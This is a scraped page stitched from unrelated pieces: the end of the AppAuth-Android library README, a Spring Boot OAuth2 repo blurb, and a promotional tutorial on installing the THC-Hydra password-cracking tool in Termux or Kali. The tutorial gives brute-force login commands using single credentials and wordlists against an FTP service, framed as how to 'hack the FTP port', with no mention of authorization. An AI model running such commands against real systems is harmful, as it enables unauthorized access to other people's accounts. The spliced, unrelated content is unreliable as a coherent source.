authState.performActionWithFreshTokens( authService, clientAuth, action); ``` ## Modifying or contributing to AppAuth This project requires the Android SDK for API level 25 (Nougat) to build, though the produced binaries only require API level 16 (Jellybean) to be used. We recommend that you fork and/or clone this repository to make modifications; downloading the source has been known to cause some developers problems. For contributors, see the additional instructions in [CONTRIBUTING.md](https://github.com/openid/AppAuth-Android/blob/master/CONTRIBUTING.md). ### Building from the Command line AppAuth for Android uses Gradle as its build system. In order to build the library and app binaries, run `./gradlew assemble`. The library AAR files are output to `library/build/outputs/aar`, while the demo app is output to `app/build/outputs/apk`. In order to run the tests and code analysis, run `./gradlew check`. ### Building from Android Studio In AndroidStudio, File -> New -> Import project. Select the root folder (the one with the `build.gradle` file).
JavaChinna / Spring Boot Oauth2Spring boot User Registration and OAuth2 Social login with Facebook, Google, LinkedIn and Github
VEDARSH05 / Hydrahow to install hydra how to install hydra- Hi guys if you are searching for how to install hydra and searching for the best article to get the best explanation about how to install hydra. Then you are in the right place. Today I'm here going to share the step by step tutorial about "how to install hydra". Through this article, you can get a lot of about how to install hydra and use in termux, how to install hydra in termux, how to install hydra on kali linux. And I'm damn sure that you will never get all this unique information like us on the internet anywhere else. how to install hydra What is Hydra Tool? Thc-hydra, In short, we can call it hydra, This tool is used for penetration testing and cracking the open ports and web login pages like FTP login pages, HTTP login pages, and many more pages. This tool is purely made to make the cracking process more efficient with the best results. So this tool is available for only some limited devices like Linux, Debian based but today will discuss how to install the hydra tool on any device without any errors or issues, Like termux and other terminal emulator apps. How to Install Hydra? To Install hydra there are some must requirements which you need to follow. REQUIREMENTS (Termux/Kali) > 1 GB of data storage > 50 MB internet data > 3 GB of ram for better performance > Android with 5.0.0 and higher > Rooted device I hope, you had followed all the requirements properly. 1. Install Termux app from F-droid app, and update & upgrade it. apt-get update apt-get upgrade 2. After updating Termux, Install basic packages like python, curl, wget, php, etc. apt install -y python php curl wget git nano 3. Now open the Termux home directory. cd $HOME 4. Git clone the hydra link in termux/kali. git clone https://github.com/vanhauser-thc/thc-hydra 5. Now open the cloned hydra repository in your terminal. cd $HOME/thc-hydra 6. Install some packages by executing the config script. ./configure make make install 7. All ready to go, Hydra tool usage help command. ./hydra -h 8. It's time for a little practical demonstration, So suppose you want to hack the FTP port then we can try this command. ./hydra -l admin -p password ftp://localhost/ 9. For more info you can check these commands, In which you get a proper idea about how you can use -p And -P commands according to your needs, That's all. hydra -l admin -p password ftp://localhost/ hydra -L default_logins.txt -p test ftp://localhost/ hydra -l admin -P common_passwords.txt ftp://localhost/ hydra -L logins.txt -P passwords.txt ftp://localhost/
